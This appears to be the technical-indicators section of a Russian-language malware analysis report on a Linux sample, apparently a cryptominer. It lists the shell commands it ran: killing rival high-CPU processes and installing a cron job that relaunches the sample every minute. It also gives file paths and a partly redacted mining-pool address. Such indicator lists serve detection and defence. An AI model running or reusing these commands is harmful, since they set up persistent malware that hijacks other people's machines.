Техническая информация
- /var/spool/cron/crontabs/root
- sh -c if [ `id -u` -eq '0' ]; then ps aux | grep -v grep | grep -v -- '-bash[[:space:]]*$' | grep -v /usr/sbin/httpd | awk '{if($3>30.0) print $2}' | while read procid; do kill -9 $procid 2>/dev/null; done else ps -u `whoami` ux | grep -v grep | grep -v -- '-bash[[:space:]]*$' | grep -v /usr/sbin/httpd | awk '{if($3>30.0) print $2}' | while read procid; do kill -9 $procid 2>/dev/null; done fi
- id -u
- ps aux
- grep -v grep
- grep -v -- -bash[[:space:]]*$
- grep -v /usr/sbin/httpd
- awk {if($3>30.0) print $2}
- sh -c dir=`pwd`;rm -rf $dir/.cron;crontab -l 2>/dev/null | grep -v grep | grep -v '<SAMPLE_FULL_PATH>' > .cron;echo '* * * * * '$dir/'<SAMPLE_FULL_PATH>' >> .cron; if [ $(crontab -l 2>/dev/null | grep -v grep | grep '<SAMPLE_FULL_PATH>$' | sort | uniq | wc -l) -eq '0' ]; then crontab $dir/.cron 2>/dev/null; fi;rm -rf $dir/.cron
- rm -rf /root/.cron
- crontab -l
- grep -v <SAMPLE_FULL_PATH>
- grep <SAMPLE_FULL_PATH>$
- sort
- wc -l
- uniq
- crontab /root/.cron
- sh -c if [ `id -u` -eq '0' ]; then if [ `ps aux | grep -v grep | grep -- '-bash[[:space:]]*$' | awk '{if($3>30.0) print $2}' | wc -l` -gt 1 ]; then ps aux | grep -v grep | grep -- '-bash[[:space:]]*$' | awk '{if($3>30.0) print $2}' | while read procid; do kill -9 $procid 2>/dev/null; done fi else myid=`whoami`; if [ `ps -u $myid ux | grep -v grep | grep -- '-bash[[:space:]]*$' | awk '{if($3>30.0) print $2}' | wc -l` -gt 1 ]; then ps -u $myid ux | grep -v grep | grep -- '-bash[[:space:]]*$' | awk '{if($3>30.0) print $2}' | while read procid; do kill -9 $procid 2>/dev/null; done fi fi
- grep -- -bash[[:space:]]*$
- /var/spool/cron/crontabs/tmp.ZPaxbL
- /root/.cron
- /var/spool/cron/.cron
- /var/spool/cron/crontabs/tmp.ZPaxbL
- /tmp/.lock
- /root/.cron
- /tmp/.lock
- 51.##.54.102:14444
- 51.##.54.102:14444
- 51.##.54.102:14444